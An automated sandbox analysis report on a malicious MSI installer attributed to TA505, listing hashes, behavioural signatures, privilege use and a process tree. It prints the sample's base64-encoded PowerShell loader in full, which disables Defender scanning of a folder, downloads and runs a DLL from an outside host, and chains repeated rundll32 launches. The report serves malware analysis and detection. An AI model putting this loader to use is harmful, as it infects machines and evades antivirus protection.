Analysis
-
max time kernel
1692s -
max time network
1576s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-10-2022 00:32
Static task
static1
Behavioral task
behavioral1
Sample
fc081ae799c663668e679680b8aa7ff825458beff211d0be1848b96905a31124.msi
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
fc081ae799c663668e679680b8aa7ff825458beff211d0be1848b96905a31124.msi
Resource
win10v2004-20220812-en
General
-
Target
fc081ae799c663668e679680b8aa7ff825458beff211d0be1848b96905a31124.msi
-
Size
9.7MB
-
MD5
bcdf12044dc371543ed7b14c4bf8a586
-
SHA1
4cb4b2b5978500d17526cbd238717781249a023c
-
SHA256
fc081ae799c663668e679680b8aa7ff825458beff211d0be1848b96905a31124
-
SHA512
c95bad64458fe6bb80bd94419338d115f580ce6cfb4b89f8fc33ea51b97fcb4bfad7ec0c82914d5ef5152d722f36fe948a135c2261bb0160c6a04c3ccaca3195
-
SSDEEP
196608:Ie9vBbrDJa8hjX5FEhDUt5D4oJ+zLzfVV:/bZL526HD4Vn
Malware Config
Signatures
-
TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 18 3444 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 5008 MSI9FF4.tmp -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation MSI9FF4.tmp -
Loads dropped DLL 15 IoCs
pid Process 360 MsiExec.exe 360 MsiExec.exe 360 MsiExec.exe 360 MsiExec.exe 360 MsiExec.exe 3928 rundll32.exe 388 rundll32.exe 5000 rundll32.exe 2568 rundll32.exe 4860 rundll32.exe 4416 rundll32.exe 620 rundll32.exe 616 rundll32.exe 4692 rundll32.exe 4828 rundll32.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: msiexec.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI9D12.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9D51.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{EE7BD9E1-8B3D-411A-9CB2-0D554ED2FC08} msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI96E6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9929.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9EE9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9FF4.tmp msiexec.exe File created C:\Windows\Installer\e56963a.msi msiexec.exe File opened for modification C:\Windows\Installer\e56963a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI9DB0.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2040 msiexec.exe 2040 msiexec.exe 3444 powershell.exe 3444 powershell.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeShutdownPrivilege 4296 msiexec.exe Token: SeIncreaseQuotaPrivilege 4296 msiexec.exe Token: SeSecurityPrivilege 2040 msiexec.exe Token: SeCreateTokenPrivilege 4296 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4296 msiexec.exe Token: SeLockMemoryPrivilege 4296 msiexec.exe Token: SeIncreaseQuotaPrivilege 4296 msiexec.exe Token: SeMachineAccountPrivilege 4296 msiexec.exe Token: SeTcbPrivilege 4296 msiexec.exe Token: SeSecurityPrivilege 4296 msiexec.exe Token: SeTakeOwnershipPrivilege 4296 msiexec.exe Token: SeLoadDriverPrivilege 4296 msiexec.exe Token: SeSystemProfilePrivilege 4296 msiexec.exe Token: SeSystemtimePrivilege 4296 msiexec.exe Token: SeProfSingleProcessPrivilege 4296 msiexec.exe Token: SeIncBasePriorityPrivilege 4296 msiexec.exe Token: SeCreatePagefilePrivilege 4296 msiexec.exe Token: SeCreatePermanentPrivilege 4296 msiexec.exe Token: SeBackupPrivilege 4296 msiexec.exe Token: SeRestorePrivilege 4296 msiexec.exe Token: SeShutdownPrivilege 4296 msiexec.exe Token: SeDebugPrivilege 4296 msiexec.exe Token: SeAuditPrivilege 4296 msiexec.exe Token: SeSystemEnvironmentPrivilege 4296 msiexec.exe Token: SeChangeNotifyPrivilege 4296 msiexec.exe Token: SeRemoteShutdownPrivilege 4296 msiexec.exe Token: SeUndockPrivilege 4296 msiexec.exe Token: SeSyncAgentPrivilege 4296 msiexec.exe Token: SeEnableDelegationPrivilege 4296 msiexec.exe Token: SeManageVolumePrivilege 4296 msiexec.exe Token: SeImpersonatePrivilege 4296 msiexec.exe Token: SeCreateGlobalPrivilege 4296 msiexec.exe Token: SeRestorePrivilege 2040 msiexec.exe Token: SeTakeOwnershipPrivilege 2040 msiexec.exe Token: SeRestorePrivilege 2040 msiexec.exe Token: SeTakeOwnershipPrivilege 2040 msiexec.exe Token: SeRestorePrivilege 2040 msiexec.exe Token: SeTakeOwnershipPrivilege 2040 msiexec.exe Token: SeRestorePrivilege 2040 msiexec.exe Token: SeTakeOwnershipPrivilege 2040 msiexec.exe Token: SeRestorePrivilege 2040 msiexec.exe Token: SeTakeOwnershipPrivilege 2040 msiexec.exe Token: SeRestorePrivilege 2040 msiexec.exe Token: SeTakeOwnershipPrivilege 2040 msiexec.exe Token: SeRestorePrivilege 2040 msiexec.exe Token: SeTakeOwnershipPrivilege 2040 msiexec.exe Token: SeRestorePrivilege 2040 msiexec.exe Token: SeTakeOwnershipPrivilege 2040 msiexec.exe Token: SeRestorePrivilege 2040 msiexec.exe Token: SeTakeOwnershipPrivilege 2040 msiexec.exe Token: SeRestorePrivilege 2040 msiexec.exe Token: SeTakeOwnershipPrivilege 2040 msiexec.exe Token: SeDebugPrivilege 3444 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4296 msiexec.exe 4296 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2040 wrote to memory of 360 2040 msiexec.exe 86 PID 2040 wrote to memory of 360 2040 msiexec.exe 86 PID 2040 wrote to memory of 360 2040 msiexec.exe 86 PID 2040 wrote to memory of 5008 2040 msiexec.exe 87 PID 2040 wrote to memory of 5008 2040 msiexec.exe 87 PID 5008 wrote to memory of 3444 5008 MSI9FF4.tmp 88 PID 5008 wrote to memory of 3444 5008 MSI9FF4.tmp 88 PID 3444 wrote to memory of 4348 3444 powershell.exe 92 PID 3444 wrote to memory of 4348 3444 powershell.exe 92 PID 4348 wrote to memory of 3928 4348 rundll32.exe 93 PID 4348 wrote to memory of 3928 4348 rundll32.exe 93 PID 4348 wrote to memory of 3928 4348 rundll32.exe 93 PID 3928 wrote to memory of 1444 3928 rundll32.exe 99 PID 3928 wrote to memory of 1444 3928 rundll32.exe 99 PID 3928 wrote to memory of 1444 3928 rundll32.exe 99 PID 2448 wrote to memory of 2000 2448 explorer.exe 101 PID 2448 wrote to memory of 2000 2448 explorer.exe 101 PID 2000 wrote to memory of 1476 2000 cmd.exe 103 PID 2000 wrote to memory of 1476 2000 cmd.exe 103 PID 1476 wrote to memory of 388 1476 rundll32.exe 104 PID 1476 wrote to memory of 388 1476 rundll32.exe 104 PID 1476 wrote to memory of 388 1476 rundll32.exe 104 PID 388 wrote to memory of 4892 388 rundll32.exe 105 PID 388 wrote to memory of 4892 388 rundll32.exe 105 PID 388 wrote to memory of 4892 388 rundll32.exe 105 PID 4120 wrote to memory of 5116 4120 explorer.exe 107 PID 4120 wrote to memory of 5116 4120 explorer.exe 107 PID 5116 wrote to memory of 2572 5116 cmd.exe 109 PID 5116 wrote to memory of 2572 5116 cmd.exe 109 PID 2572 wrote to memory of 5000 2572 rundll32.exe 110 PID 2572 wrote to memory of 5000 2572 rundll32.exe 110 PID 2572 wrote to memory of 5000 2572 rundll32.exe 110 PID 5000 wrote to memory of 5060 5000 rundll32.exe 111 PID 5000 wrote to memory of 5060 5000 rundll32.exe 111 PID 5000 wrote to memory of 5060 5000 rundll32.exe 111 PID 1980 wrote to memory of 2932 1980 explorer.exe 113 PID 1980 wrote to memory of 2932 1980 explorer.exe 113 PID 2932 wrote to memory of 3612 2932 cmd.exe 115 PID 2932 wrote to memory of 3612 2932 cmd.exe 115 PID 3612 wrote to memory of 2568 3612 rundll32.exe 116 PID 3612 wrote to memory of 2568 3612 rundll32.exe 116 PID 3612 wrote to memory of 2568 3612 rundll32.exe 116 PID 2568 wrote to memory of 3792 2568 rundll32.exe 117 PID 2568 wrote to memory of 3792 2568 rundll32.exe 117 PID 2568 wrote to memory of 3792 2568 rundll32.exe 117 PID 3060 wrote to memory of 4100 3060 explorer.exe 119 PID 3060 wrote to memory of 4100 3060 explorer.exe 119 PID 4100 wrote to memory of 332 4100 cmd.exe 121 PID 4100 wrote to memory of 332 4100 cmd.exe 121 PID 332 wrote to memory of 4860 332 rundll32.exe 122 PID 332 wrote to memory of 4860 332 rundll32.exe 122 PID 332 wrote to memory of 4860 332 rundll32.exe 122 PID 4860 wrote to memory of 1248 4860 rundll32.exe 123 PID 4860 wrote to memory of 1248 4860 rundll32.exe 123 PID 4860 wrote to memory of 1248 4860 rundll32.exe 123 PID 384 wrote to memory of 3244 384 explorer.exe 125 PID 384 wrote to memory of 3244 384 explorer.exe 125 PID 3244 wrote to memory of 1772 3244 cmd.exe 127 PID 3244 wrote to memory of 1772 3244 cmd.exe 127 PID 1772 wrote to memory of 4416 1772 rundll32.exe 128 PID 1772 wrote to memory of 4416 1772 rundll32.exe 128 PID 1772 wrote to memory of 4416 1772 rundll32.exe 128 PID 4416 wrote to memory of 1696 4416 rundll32.exe 129 PID 4416 wrote to memory of 1696 4416 rundll32.exe 129
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\fc081ae799c663668e679680b8aa7ff825458beff211d0be1848b96905a31124.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4296
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 166840B54DB59CF4E7B59F0566CC04582⤵
- Loads dropped DLL
PID:360
-
-
C:\Windows\Installer\MSI9FF4.tmp"C:\Windows\Installer\MSI9FF4.tmp" /RunAsAdmin /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE4AZQBvAHMAbwBmAHQAXABJAG4AcwB0AGEAbABsAGUAcgAiACkALgBQAGEAdABoACAALQBsAGUAYQBmADsADQAKACQAZABpAHIAIAA9ACAAJABlAG4AdgA6AHAAcgBvAGcAcgBhAG0AZABhAHQAYQA7AA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABkAGkAcgA7AA0ACgAkAGYAbgAgAD0AIAAkAGQAaQByACAAKwAgACIAXAAiACAAKwAgACgARwBlAHQALQBSAGEAbgBkAG8AbQApAC4AVABvAFMAdAByAGkAbgBnACgAIgB4ADgAIgApACAAKwAgACIALgBkAGEAdAAiAA0ACgAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAZAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBkAG8AdwBuAGwAbwBhAGQALQBjAGQAbgAuAGMAbwBtACIAOwANAAoAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAZAAgACsAIAAiAC8AZABvAHcAbgBsAG8AYQBkAC4AcABoAHAAPwBmAD0ATABkAHIALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA0ACgAkAGYAbgAgAD0AIAAkAGYAbgAgACsAIAAiAC4AbQBzAGkAIgA7AA0ACgAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABkACAAKwAgACIALwBkAGUAYwBvAHkALwAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAoACQAZgBuACkAOwA=2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE4AZQBvAHMAbwBmAHQAXABJAG4AcwB0AGEAbABsAGUAcgAiACkALgBQAGEAdABoACAALQBsAGUAYQBmADsADQAKACQAZABpAHIAIAA9ACAAJABlAG4AdgA6AHAAcgBvAGcAcgBhAG0AZABhAHQAYQA7AA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABkAGkAcgA7AA0ACgAkAGYAbgAgAD0AIAAkAGQAaQByACAAKwAgACIAXAAiACAAKwAgACgARwBlAHQALQBSAGEAbgBkAG8AbQApAC4AVABvAFMAdAByAGkAbgBnACgAIgB4ADgAIgApACAAKwAgACIALgBkAGEAdAAiAA0ACgAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAZAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBkAG8AdwBuAGwAbwBhAGQALQBjAGQAbgAuAGMAbwBtACIAOwANAAoAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAZAAgACsAIAAiAC8AZABvAHcAbgBsAG8AYQBkAC4AcABoAHAAPwBmAD0ATABkAHIALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA0ACgAkAGYAbgAgAD0AIAAkAGYAbgAgACsAIAAiAC4AbQBzAGkAIgA7AA0ACgAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABkACAAKwAgACIALwBkAGUAYwBvAHkALwAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAoACQAZgBuACkAOwA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\ProgramData\72c6571d.dat",DllRegisterServer4⤵
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\ProgramData\72c6571d.dat",DllRegisterServer5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\68A3.tmp.bat"6⤵PID:1444
-
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\68A3.tmp.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer3⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\2B3E.tmp.bat"5⤵PID:4892
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2B3E.tmp.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer3⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\ED5B.tmp.bat"5⤵PID:5060
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ED5B.tmp.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer3⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\AF1B.tmp.bat"5⤵PID:3792
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AF1B.tmp.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer3⤵
- Suspicious use of WriteProcessMemory
PID:332 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\710A.tmp.bat"5⤵PID:1248
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\710A.tmp.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer3⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\3318.tmp.bat"5⤵PID:1696
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:5040
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3318.tmp.bat" "2⤵PID:1232
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer3⤵PID:4388
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer4⤵
- Loads dropped DLL
PID:620 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\F516.tmp.bat"5⤵PID:4616
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:2040
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F516.tmp.bat" "2⤵PID:3656
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer3⤵PID:1644
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer4⤵
- Loads dropped DLL
PID:616 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\B734.tmp.bat"5⤵PID:3100
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:3716
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B734.tmp.bat" "2⤵PID:1496
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer3⤵PID:2980
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer4⤵
- Loads dropped DLL
PID:4692 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\7971.tmp.bat"5⤵PID:2604
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:1260
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7971.tmp.bat" "2⤵PID:2040
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer3⤵PID:3800
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\72c6571d.dat",DllRegisterServer4⤵
- Loads dropped DLL
PID:4828
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
111KB
MD58f3925918f46484ce255b4cd8e2dd199
SHA12cbf19cdc9cc634dee05b4a83a83ab71ce5b2756
SHA25637f9f39c038f1c51603746d2513f62714267b8745cfefa3747425317c97ffd06
SHA5124f2a09a4b81374129c0ef194f3f1236559da13045f9787efba78925cd3787a60529bc3ef26762062cd677d0bbd2010a515ceaf687d7ec14bee4ce032b3926b6f
-
Filesize
111KB
MD58f3925918f46484ce255b4cd8e2dd199
SHA12cbf19cdc9cc634dee05b4a83a83ab71ce5b2756
SHA25637f9f39c038f1c51603746d2513f62714267b8745cfefa3747425317c97ffd06
SHA5124f2a09a4b81374129c0ef194f3f1236559da13045f9787efba78925cd3787a60529bc3ef26762062cd677d0bbd2010a515ceaf687d7ec14bee4ce032b3926b6f
-
Filesize
111KB
MD58f3925918f46484ce255b4cd8e2dd199
SHA12cbf19cdc9cc634dee05b4a83a83ab71ce5b2756
SHA25637f9f39c038f1c51603746d2513f62714267b8745cfefa3747425317c97ffd06
SHA5124f2a09a4b81374129c0ef194f3f1236559da13045f9787efba78925cd3787a60529bc3ef26762062cd677d0bbd2010a515ceaf687d7ec14bee4ce032b3926b6f
-
Filesize
111KB
MD58f3925918f46484ce255b4cd8e2dd199
SHA12cbf19cdc9cc634dee05b4a83a83ab71ce5b2756
SHA25637f9f39c038f1c51603746d2513f62714267b8745cfefa3747425317c97ffd06
SHA5124f2a09a4b81374129c0ef194f3f1236559da13045f9787efba78925cd3787a60529bc3ef26762062cd677d0bbd2010a515ceaf687d7ec14bee4ce032b3926b6f
-
Filesize
111KB
MD58f3925918f46484ce255b4cd8e2dd199
SHA12cbf19cdc9cc634dee05b4a83a83ab71ce5b2756
SHA25637f9f39c038f1c51603746d2513f62714267b8745cfefa3747425317c97ffd06
SHA5124f2a09a4b81374129c0ef194f3f1236559da13045f9787efba78925cd3787a60529bc3ef26762062cd677d0bbd2010a515ceaf687d7ec14bee4ce032b3926b6f
-
Filesize
111KB
